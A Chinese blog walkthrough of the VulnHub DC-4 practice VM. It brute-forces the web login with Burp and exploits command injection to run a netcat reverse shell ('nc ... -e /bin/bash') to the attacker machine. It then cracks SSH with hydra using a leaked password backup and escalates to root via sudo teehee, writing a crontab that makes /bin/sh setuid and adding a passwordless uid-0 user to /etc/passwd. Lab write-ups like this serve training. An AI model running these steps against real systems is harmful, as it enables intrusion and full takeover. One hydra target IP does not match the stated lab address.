vulnhub DC-4 靶机渗透

准备:

环境:vmware15.5以上(我用的是16.0的)

攻击机:kali 2019以上(2021)

靶机:DC-4

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/

 

靶机ip:192.168.10.137

攻击机ip:  192.168.10.136

 

1、老样子 先查看自己攻击的IP 来确定网段

ipconfig

 

2、扫描网段内的存活主机

arp-scan -l

 

访问一下看看

这边只有一个登入的界面

 

3、老样子 我们先扫描一下端口和服务

nmap -T4 -A -p- 192.168.10.137

 

 

分析:

22 端口  ssh服务

80 端口 http服务

 

思路:

1、密码爆破

2、找到突破点(文件上传、命令执行等)上传小马

3、提权

 

4、敏感目录扫描

nikto -h 192.168.10.137

没有找到明感目录

 

5、暴力破解

1)、打开代理

 

2)、burp抓包

ctrl+i

 

 

一般攻击类型选Cluster bomb(交叉)

这里为了方便我就选了sniper 对密码单一破解

网站的用户名一般用的是admin

注:记得吧包放了

 

3)、设置playload

用户名:admin

密码:happy

 

登入后的界面

 

6、命令执行

发现是命令执行

 

1)、burp抓包

Ctrl+r (模拟提交)

记得吧包放了

 

发现它屏蔽了空格  它用+号代替

 

2)、nc反弹shell

       kali监听端口

       nc -lvp 5555

       

 

        命令执行

        nc+192.168.10.136+5555+-e+/bin/bash

       

        nc+kali ip+端口+-e+/bin/bash

 

       

 

7、看看用户文件有啥

cd /

cd home/jim/backups

ls

这里只有jim文件夹下有有用的内容

old-passwords.bak  密码备份文件

 

8、将old密码弄成字典

cat old-passwords.bak

将密码复制下来 另存在kali上

 

9. hydra破解jim ssh登入密码

新开一个命令行

 hydra -l jim -P passwd.txt -t 5 ssh://192.168.98.180

hydra -l jim -P 字典 -t 5 ssh://目标ip

 

login:  jim

password: jibril04

 

10.登入ssh

ssh jim@192.168.10.137

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

jibril04

 

11.通过jim的邮件可以找到charles的密码

cd /var/mail

cat jim

charles的密码:^xHhA&hvim0y

 

12.切换charles用户

su charles

 

13.设置定时任务

echo root chmod 4777 /bin/sh > /etc/crontab

发现没权限

 

14.teehee提权

sudo teehee /etc/crontab

* * * * * root chmod 4777 /bin/sh

Ctrl+c保存退出

每分钟将 /bin/sh 的权限修改为4777

 

15.看看有没有改成功

ls -la /bin/sh

发现都可读可写可执行了

 

16.最后我们可以利用teehee创建一个root用户

sudo teehee -a /etc/passwd

user::0:0:::/bin/bash

su user

posted @ 2022-03-19 01:13  弹个shell?  阅读(169)  评论(0)    收藏  举报